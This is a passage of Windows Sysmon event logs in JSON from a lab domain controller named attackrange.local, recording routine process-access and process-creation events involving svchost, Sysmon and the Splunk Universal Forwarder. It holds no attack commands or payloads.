{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:42.032\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B2-5F25-0000-0010904F0600}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:42.032","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B2-5F25-0000-0010904F0600}","TargetProcessId":"4420","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nProcessGuid: {41C8662E-20B3-5F25-0000-00108C510600}\r\nProcessId: 3892\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:43.345","ProcessGuid":"{41C8662E-20B3-5F25-0000-00108C510600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:43.345\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B3-5F25-0000-00108C510600}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program 